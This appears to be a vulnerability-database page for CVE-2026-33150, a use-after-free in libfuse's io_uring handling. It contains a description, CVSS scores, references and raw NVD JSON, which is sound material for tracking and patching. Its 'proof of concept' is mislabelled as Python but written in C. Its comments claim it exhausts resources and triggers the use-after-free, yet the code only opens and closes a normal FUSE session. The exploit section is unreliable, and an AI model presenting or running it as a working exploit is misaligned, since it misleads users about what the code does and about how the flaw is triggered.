CVE-2026-33150

Description

libfuse is the reference implementation of the Linux FUSE. From version 3.18.0 to before version 3.18.2, a use-after-free vulnerability in the io_uring subsystem of libfuse allows a local attacker to crash FUSE filesystem processes and potentially execute arbitrary code. When io_uring thread creation fails due to resource exhaustion (e.g., cgroup pids.max), fuse_uring_start() frees the ring pool structure but stores the dangling pointer in the session state, leading to a use-after-free when the session shuts down. The trigger is reliable in containerized environments where cgroup pids.max limits naturally constrain thread creation. This issue has been patched in version 3.18.2.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:libfuse_project:libfuse:*:*:*:*:*:*:*:* - VULNERABLE

libfuse 3.18.0 至 3.18.2 之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Conceptual Proof of Concept for CVE-2026-33150
// Trigger condition: Resource exhaustion leading to io_uring thread creation failure.

#include <fuse3/fuse.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

static const struct fuse_operations oper = {};

int main(int argc, char *argv[]) {
    struct fuse_args args = FUSE_ARGS_INIT(argc, argv);
    
    // Simulate resource exhaustion to trigger the bug
    // In a real container, hitting pids.max causes fuse_uring_start to fail
    printf("Attempting to trigger resource exhaustion...\n");
    
    // Create FUSE session
    struct fuse_session *se = fuse_session_new(&args, &oper, sizeof(oper), NULL);
    if (!se) {
        perror("fuse_session_new");
        return 1;
    }

    if (fuse_session_mount(se, "/tmp/fuse_test") != 0) {
        perror("fuse_session_mount");
        return 1;
    }

    printf("Session started. Trigger cleanup to cause UAF...\n");
    
    // Cleanup triggers the use-after-free on the dangling pointer
    fuse_session_unmount(se);
    fuse_session_destroy(se);
    
    fuse_opt_free_args(&args);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33150
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33150
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33150/
[4] VulDB https://vuldb.com/cve/CVE-2026-33150
[5] https://github.com/libfuse/libfuse/commit/49fcd891a58f622c098e2ca67d66086f7b213836
[6] https://github.com/libfuse/libfuse/releases/tag/fuse-3.18.2
[7] https://github.com/libfuse/libfuse/security/advisories/GHSA-qxv7-xrc2-qmfx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33150", "sourceIdentifier": "[email protected]", "published": "2026-03-20T21:17:15.410", "lastModified": "2026-03-23T19:16:14.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libfuse is the reference implementation of the Linux FUSE. From version 3.18.0 to before version 3.18.2, a use-after-free vulnerability in the io_uring subsystem of libfuse allows a local attacker to crash FUSE filesystem processes and potentially execute arbitrary code. When io_uring thread creation fails due to resource exhaustion (e.g., cgroup pids.max), fuse_uring_start() frees the ring pool structure but stores the dangling pointer in the session state, leading to a use-after-free when the session shuts down. The trigger is reliable in containerized environments where cgroup pids.max limits naturally constrain thread creation. This issue has been patched in version 3.18.2."}, {"lang": "es", "value": "libfuse es la implementación de referencia de FUSE de Linux. Desde la versión 3.18.0 hasta antes de la versión 3.18.2, una vulnerabilidad de uso después de liberación en el subsistema io_uring de libfuse permite a un atacante local colapsar procesos del sistema de archivos FUSE y potencialmente ejecutar código arbitrario. Cuando la creación de hilos de io_uring falla debido al agotamiento de recursos (por ejemplo, cgroup pids.max), fuse_uring_start() libera la estructura del pool de anillos pero almacena el puntero colgante en el estado de la sesión, lo que lleva a un uso después de liberación cuando la sesión se cierra. El disparador es fiable en entornos contenerizados donde los límites de cgroup pids.max restringen naturalmente la creación de hilos. Este problema ha sido parcheado en la versión 3.18.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libfuse_project:libfuse:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.18.0", "versionEndExcluding": "3.18.2", "matchCriteriaId": "83EF6E3E-F5F2-4CE2-B497-62493DAB2A1F"}]}]}], "references": [{"url": "https://github.com/libfuse/libfuse/commit/49fcd891a58f622c098e2ca67d66086f7b213836", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/libfuse/libfuse/releases/tag/fuse-3.18.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/libfuse/libfuse/security/advisories/GHSA-qxv7-xrc2-qmfx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}